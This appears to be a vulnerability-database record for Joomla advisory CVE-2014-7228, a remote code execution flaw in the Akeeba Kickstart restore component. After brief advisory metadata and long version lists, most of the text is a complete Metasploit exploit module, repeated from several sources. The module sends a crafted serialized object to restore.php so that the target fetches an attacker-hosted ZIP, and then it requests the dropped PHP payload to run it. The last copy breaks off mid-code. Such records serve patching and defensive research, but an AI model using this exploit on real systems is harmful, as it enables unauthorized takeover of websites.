ID JOOMLA-595
Type joomla
Reporter Open Source Matters, Inc.
Modified 2014-09-30T00:00:00
Description
Inadequate checking allowed the potential for remote files to be executed.
{"edition": 4, "references": [], "modified": "2014-09-30T00:00:00", "cvelist": ["CVE-2014-7228"], "bulletinFamily": "software", "href": "https://developer.joomla.org/security-centre/595-20140903-core-remote-file-inclusion.html?highlight=WyJleHBsb2l0Il0=", "description": "Inadequate checking allowed the potential for remote files to be executed.\n", "id": "JOOMLA-595", "affectedSoftware": [{"name": "joomla! cms", "operator": "lt", "version": "3.2.6"}, {"name": "joomla! cms", "operator": "lt", "version": "3.3.5"}, {"name": "joomla! cms", "operator": "lt", "version": "2.5.26"}], "lastseen": "2020-12-24T13:21:28", "published": "2014-09-30T00:00:00", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-7228"]}, {"type": "zdt", "idList": ["1337DAY-ID-22775"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128774"]}, {"type": "seebug", "idList": ["SSV:87326"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_AKEEBA_UNSERIALIZE"]}, {"type": "exploitdb", "idList": ["EDB-ID:35033"]}, {"type": "freebsd", "idList": ["CEC4D01A-7AC5-11E5-B35A-002590263BF5"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_CEC4D01A7AC511E5B35A002590263BF5.NASL", "JOOMLA_335.NASL"]}], "modified": "2020-12-24T13:21:28", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2020-12-24T13:21:28", "rev": 2}, "vulnersScore": 5.7}, "type": "joomla", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "title": "[20140903] - Core - Remote File Inclusion", "reporter": "Open Source Matters, Inc.", "viewCount": 64, "scheme": null}
{"cve": [{"lastseen": "2020-10-03T12:01:21", "description": "Akeeba Restore (restore.php), as used in Joomla! 2.5.4 through 2.5.25, 3.x through 3.2.5, and 3.3.0 through 3.3.4; Akeeba Backup for Joomla! Professional 3.0.0 through 4.0.2; Backup Professional for WordPress 1.0.b1 through 1.1.3; Solo 1.0.b1 through 1.1.2; Admin Tools Core and Professional 2.0.0 through 2.4.4; and CMS Update 1.0.a1 through 1.0.1, when performing a backup or update for an archive, does not delete parameters from $_GET and $_POST when it is cleansing $_REQUEST, but later accesses $_GET and $_POST using the getQueryParam function, which allows remote attackers to bypass encryption and execute arbitrary code via a command message that extracts a crafted archive.", "edition": 3, "cvss3": {}, "published": "2014-11-03T22:55:00", "title": "CVE-2014-7228", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7228"], "modified": "2016-05-09T15:36:00", "cpe": ["cpe:/a:joomla:joomla\\!:3.2.0", "cpe:/a:joomla:joomla\\!:2.5.19", "cpe:/a:joomla:joomla\\!:2.5.20", "cpe:/a:joomla:joomla\\!:3.0.0", "cpe:/a:joomla:joomla\\!:3.2.5", "cpe:/a:joomla:joomla\\!:2.5.10", "cpe:/a:joomla:joomla\\!:3.0.3", "cpe:/a:joomla:joomla\\!:3.3.0", "cpe:/a:joomla:joomla\\!:2.5.22", "cpe:/a:joomla:joomla\\!:2.5.18", "cpe:/a:joomla:joomla\\!:2.5.11", "cpe:/a:joomla:joomla\\!:3.3.4", "cpe:/a:joomla:joomla\\!:3.1.4", "cpe:/a:joomla:joomla\\!:3.2.2", "cpe:/a:joomla:joomla\\!:3.2.1", "cpe:/a:joomla:joomla\\!:2.5.4", "cpe:/a:joomla:joomla\\!:3.2.3", "cpe:/a:joomla:joomla\\!:2.5.15", "cpe:/a:joomla:joomla\\!:3.3.2", "cpe:/a:joomla:joomla\\!:2.5.25", "cpe:/a:joomla:joomla\\!:3.1.2", "cpe:/a:joomla:joomla\\!:2.5.13", "cpe:/a:joomla:joomla\\!:2.5.14", "cpe:/a:joomla:joomla\\!:2.5.21", "cpe:/a:joomla:joomla\\!:2.5.12", "cpe:/a:joomla:joomla\\!:3.1.0", "cpe:/a:joomla:joomla\\!:3.1.6", "cpe:/a:joomla:joomla\\!:2.5.6", "cpe:/a:joomla:joomla\\!:3.1.1", "cpe:/a:joomla:joomla\\!:3.2.4", "cpe:/a:joomla:joomla\\!:3.0.4", "cpe:/a:joomla:joomla\\!:2.5.9", "cpe:/a:joomla:joomla\\!:2.5.24", "cpe:/a:joomla:joomla\\!:2.5.17", "cpe:/a:joomla:joomla\\!:2.5.23", "cpe:/a:joomla:joomla\\!:3.1.3", "cpe:/a:joomla:joomla\\!:3.3.3", "cpe:/a:joomla:joomla\\!:2.5.8", "cpe:/a:joomla:joomla\\!:3.0.2", "cpe:/a:joomla:joomla\\!:2.5.7", "cpe:/a:joomla:joomla\\!:3.1.5", "cpe:/a:joomla:joomla\\!:2.5.5", "cpe:/a:joomla:joomla\\!:3.3.1", "cpe:/a:joomla:joomla\\!:2.5.16", "cpe:/a:joomla:joomla\\!:3.0.1"], "id": "CVE-2014-7228", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7228", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:joomla:joomla\\!:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.23:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.24:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.25:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:joomla\\!:2.5.10:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:21:46", "description": "", "published": "2014-10-21T00:00:00", "type": "packetstorm", "title": "Joomla Akeeba Kickstart Unserialize Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7228"], "modified": "2014-10-21T00:00:00", "id": "PACKETSTORM:128774", "href": "https://packetstormsecurity.com/files/128774/Joomla-Akeeba-Kickstart-Unserialize-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'rex/zip' \nrequire 'json' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Joomla Akeeba Kickstart Unserialize Remote Code Execution\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier \n3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba \ncomponent, which is responsible for Joomla! updates. Nevertheless it is worth to note \nthat this vulnerability is only exploitable during the update of the Joomla! CMS. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Johannes Dahse', # Vulnerability discovery \n'us3r777 <us3r777[at]n0b0.so>' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2014-7228' ], \n[ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'], \n[ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'], \n[ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'], \n], \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ] \n], \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Privileged' => false, \n'DisclosureDate' => \"Sep 29 2014\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']), \nOptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 5]) \n], self.class) \nend \n \ndef check \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php') \n) \n \nif res && res.code == 200 \nreturn Exploit::CheckCode::Detected \nend \n \nExploit::CheckCode::Safe \nend \n \ndef primer \nsrv_uri = \"#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip\" \n \nphp_serialized_akfactory = 'O:9:\"AKFactory\":1:{s:18:\"' + \"\\x00\" + 'AKFactory' + \"\\x00\" + 'varlist\";a:2:{s:27:\"kickstart.security.password\";s:0:\"\";s:26:\"kickstart.setup.sourcefile\";s:' + srv_uri.length.to_s + ':\"' + srv_uri + '\";}}' \nphp_filename = rand_text_alpha(8 + rand(8)) + '.php' \n \n# Create the zip archive \nprint_status(\"Creating archive with file #{php_filename}\") \nzip_file = Rex::Zip::Archive.new \nzip_file.add_file(php_filename, payload.encoded) \n@zip = zip_file.pack \n \n# First step: call restore to run _prepare() and get an initialized AKFactory \nprint_status(\"#{peer} - Sending PHP serialized object...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), \n'vars_get' => { \n'task' => 'stepRestore', \n'factory' => Rex::Text.encode_base64(php_serialized_akfactory) \n} \n}) \n \nunless res && res.code == 200 && res.body && res.body =~ /^###\\{\"status\":true.*\\}###/ \nprint_status(\"#{res.code}\\n#{res.body}\") \nfail_with(Failure::Unknown, \"#{peer} - Unexpected response\") \nend \n \n# Second step: modify the currentPartNumber within the returned serialized AKFactory \njson = /###(.*)###/.match(res.body)[1] \nbegin \nb64encoded_prepared_factory = JSON.parse(json)['factory'] \nrescue JSON::ParserError \nfail_with(Failure::Unknown, \"#{peer} - Unexpected response, cannot parse JSON\") \nend \n \nprepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory) \nmodified_factory = prepared_factory.gsub('currentPartNumber\";i:0', 'currentPartNumber\";i:-1') \n \nprint_status(\"#{peer} - Sending initialized and modified AKFactory...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), \n'vars_get' => { \n'task' => 'stepRestore', \n'factory' => Rex::Text.encode_base64(modified_factory) \n} \n}) \n \nunless res && res.code == 200 && res.body && res.body =~ /^###\\{\"status\":true.*\\}###/ \nfail_with(Failure::Unknown, \"#{peer} - Unexpected response\") \nend \n \nregister_files_for_cleanup(php_filename) \n \nprint_status(\"#{peer} - Executing payload...\") \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename) \n}, 2) \n \nend \n \ndef exploit \nbegin \nTimeout.timeout(datastore['HTTPDELAY']) { super } \nrescue Timeout::Error \n# When the server stops due to our timeout, this is raised \nend \nend \n \n# Handle incoming requests from the server \ndef on_request_uri(cli, request) \nif @zip && request.uri =~ /\\.zip$/ \nprint_status(\"Sending the ZIP archive...\") \nsend_response(cli, @zip, { 'Content-Type' => 'application/zip' }) \nreturn \nend \n \nprint_status(\"Sending not found...\") \nsend_not_found(cli) \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128774/joomla_akeeba_unserialize.rb.txt"}], "metasploit": [{"lastseen": "2020-10-07T23:30:19", "description": "This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba component, which is responsible for Joomla! updates. Nevertheless it is worth to note that this vulnerability is only exploitable during the update of the Joomla! CMS.\n", "published": "2014-10-20T18:31:22", "type": "metasploit", "title": "Joomla Akeeba Kickstart Unserialize Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7228"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_AKEEBA_UNSERIALIZE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/zip'\nrequire 'json'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Joomla Akeeba Kickstart Unserialize Remote Code Execution\",\n 'Description' => %q{\n This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier\n 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba\n component, which is responsible for Joomla! updates. Nevertheless it is worth to note\n that this vulnerability is only exploitable during the update of the Joomla! CMS.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Johannes Dahse', # Vulnerability discovery\n 'us3r777 <us3r777[at]n0b0.so>' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2014-7228' ],\n [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],\n [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],\n [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],\n ],\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]\n ],\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Privileged' => false,\n 'DisclosureDate' => '2014-09-29',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 5])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')\n )\n\n if res && res.code == 200\n return Exploit::CheckCode::Detected\n end\n\n Exploit::CheckCode::Safe\n end\n\n def primer\n srv_uri = \"#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip\"\n\n php_serialized_akfactory = 'O:9:\"AKFactory\":1:{s:18:\"' + \"\\x00\" + 'AKFactory' + \"\\x00\" + 'varlist\";a:2:{s:27:\"kickstart.security.password\";s:0:\"\";s:26:\"kickstart.setup.sourcefile\";s:' + srv_uri.length.to_s + ':\"' + srv_uri + '\";}}'\n php_filename = rand_text_alpha(8 + rand(8)) + '.php'\n\n # Create the zip archive\n print_status(\"Creating archive with file #{php_filename}\")\n zip_file = Rex::Zip::Archive.new\n zip_file.add_file(php_filename, payload.encoded)\n @zip = zip_file.pack\n\n # First step: call restore to run _prepare() and get an initialized AKFactory\n print_status(\"Sending PHP serialized object...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),\n 'vars_get' => {\n 'task' => 'stepRestore',\n 'factory' => Rex::Text.encode_base64(php_serialized_akfactory)\n }\n })\n\n unless res && res.code == 200 && res.body && res.body =~ /^###\\{\"status\":true.*\\}###/\n print_status(\"#{res.code}\\n#{res.body}\")\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response\")\n end\n\n # Second step: modify the currentPartNumber within the returned serialized AKFactory\n json = /###(.*)###/.match(res.body)[1]\n begin\n b64encoded_prepared_factory = JSON.parse(json)['factory']\n rescue JSON::ParserError\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response, cannot parse JSON\")\n end\n\n prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)\n modified_factory = prepared_factory.gsub('currentPartNumber\";i:0', 'currentPartNumber\";i:-1')\n\n print_status(\"Sending initialized and modified AKFactory...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),\n 'vars_get' => {\n 'task' => 'stepRestore',\n 'factory' => Rex::Text.encode_base64(modified_factory)\n }\n })\n\n unless res && res.code == 200 && res.body && res.body =~ /^###\\{\"status\":true.*\\}###/\n fail_with(Failure::Unknown, \"#{peer} - Unexpected response\")\n end\n\n register_files_for_cleanup(php_filename)\n\n print_status(\"Executing payload...\")\n send_request_cgi({\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)\n }, 2)\n\n end\n\n def exploit\n begin\n Timeout.timeout(datastore['HTTPDELAY']) { super }\n rescue Timeout::Error\n # When the server stops due to our timeout, this is raised\n end\n end\n\n # Handle incoming requests from the server\n def on_request_uri(cli, request)\n if @zip && request.uri =~ /\\.zip$/\n print_status(\"Sending the ZIP archive...\")\n send_response(cli, @zip, { 'Content-Type' => 'application/zip' })\n return\n end\n\n print_status(\"Sending not found...\")\n send_not_found(cli)\n end\n\n def autofilter\n true\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb"}], "seebug": [{"lastseen": "2017-11-19T13:09:53", "description": "No description provided by source.", "published": "2014-11-13T00:00:00", "type": "seebug", "title": "Joomla Akeeba Kickstart Unserialize Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7228"], "modified": "2014-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87326", "id": "SSV:87326", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\nrequire 'rex/zip'\r\nrequire 'json'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::FileDropper\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "Joomla Akeeba Kickstart Unserialize Remote Code Execution",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier\r\n 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba\r\n component, which is responsible for Joomla! updates. Nevertheless it is worth to note\r\n that this vulnerability is only exploitable during the update of the Joomla! CMS.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Johannes Dahse', # Vulnerability discovery\r\n 'us3r777 <us3r777[at]n0b0.so>' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-7228' ],\r\n [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],\r\n [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],\r\n [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],\r\n ],\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]\r\n ],\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Sep 29 2014",\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),\r\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 5])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')\r\n )\r\n \r\n if res && res.code == 200\r\n return Exploit::CheckCode::Detected\r\n end\r\n \r\n Exploit::CheckCode::Safe\r\n end\r\n \r\n def primer\r\n srv_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip"\r\n \r\n php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\\x00" + 'AKFactory' + "\\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'\r\n php_filename = rand_text_alpha(8 + rand(8)) + '.php'\r\n \r\n # Create the zip archive\r\n print_status("Creating archive with file #{php_filename}")\r\n zip_file = Rex::Zip::Archive.new\r\n zip_file.add_file(php_filename, payload.encoded)\r\n @zip = zip_file.pack\r\n \r\n # First step: call restore to run _prepare() and get an initialized AKFactory\r\n print_status("#{peer} - Sending PHP serialized object...")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),\r\n 'vars_get' => {\r\n 'task' => 'stepRestore',\r\n 'factory' => Rex::Text.encode_base64(php_serialized_akfactory)\r\n }\r\n })\r\n \r\n unless res && res.code == 200 && res.body && res.body =~ /^###\\{"status":true.*\\}###/\r\n print_status("#{res.code}\\n#{res.body}")\r\n fail_with(Failure::Unknown, "#{peer} - Unexpected response")\r\n end\r\n \r\n # Second step: modify the currentPartNumber within the returned serialized AKFactory\r\n json = /###(.*)###/.match(res.body)[1]\r\n begin\r\n b64encoded_prepared_factory = JSON.parse(json)['factory']\r\n rescue JSON::ParserError\r\n fail_with(Failure::Unknown, "#{peer} - Unexpected response, cannot parse JSON")\r\n end\r\n \r\n prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)\r\n modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1')\r\n \r\n print_status("#{peer} - Sending initialized and modified AKFactory...")\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),\r\n 'vars_get' => {\r\n 'task' => 'stepRestore',\r\n 'factory' => Rex::Text.encode_base64(modified_factory)\r\n }\r\n })\r\n \r\n unless res && res.code == 200 && res.body && res.body =~ /^###\\{"status":true.*\\}###/\r\n fail_with(Failure::Unknown, "#{peer} - Unexpected response")\r\n end\r\n \r\n register_files_for_cleanup(php_filename)\r\n \r\n print_status("#{peer} - Executing payload...")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)\r\n }, 2)\r\n \r\n end\r\n \r\n def exploit\r\n begin\r\n Timeout.timeout(datastore['HTTPDELAY']) { super }\r\n rescue Timeout::Error\r\n # When the server stops due to our timeout, this is raised\r\n end\r\n end\r\n \r\n # Handle incoming requests from the server\r\n def on_request_uri(cli, request)\r\n if @zip && request.uri =~ /\\.zip$/\r\n print_status("Sending the ZIP archive...")\r\n send_response(cli, @zip, { 'Content-Type' => 'application/zip' })\r\n return\r\n end\r\n \r\n print_status("Sending not found...")\r\n send_not_found(cli)\r\n end\r\n \r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-87326", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-04T00:27:32", "description": "Joomla Akeeba Kickstart Unserialize Remote Code Execution. CVE-2014-7228. Remote exploit for php platform", "published": "2014-10-21T00:00:00", "type": "exploitdb", "title": "Joomla Akeeba Kickstart Unserialize Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7228"], "modified": "2014-10-21T00:00:00", "id": "EDB-ID:35033", "href": "https://www.exploit-db.com/exploits/35033/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'rex/zip'\r\nrequire 'json'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Joomla Akeeba Kickstart Unserialize Remote Code Execution\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier\r\n 3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba\r\n component, which is responsible for Joomla! updates. Nevertheless it is worth to note\r\n that this vulnerability is only exploitable during the update of the Joomla! CMS.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Johannes Dahse', # Vulnerability discovery\r\n 'us3r777 <us3r777[at]n0b0.so>' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-7228' ],\r\n [ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],\r\n [ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],\r\n [ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],\r\n ],\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]\r\n ],\r\n 'Stance' => Msf::Exploit::Stance::Aggressive,\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Sep 29 2014\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),\r\n OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 5])\r\n ], self.class)\r\n end\r\n\r\n def 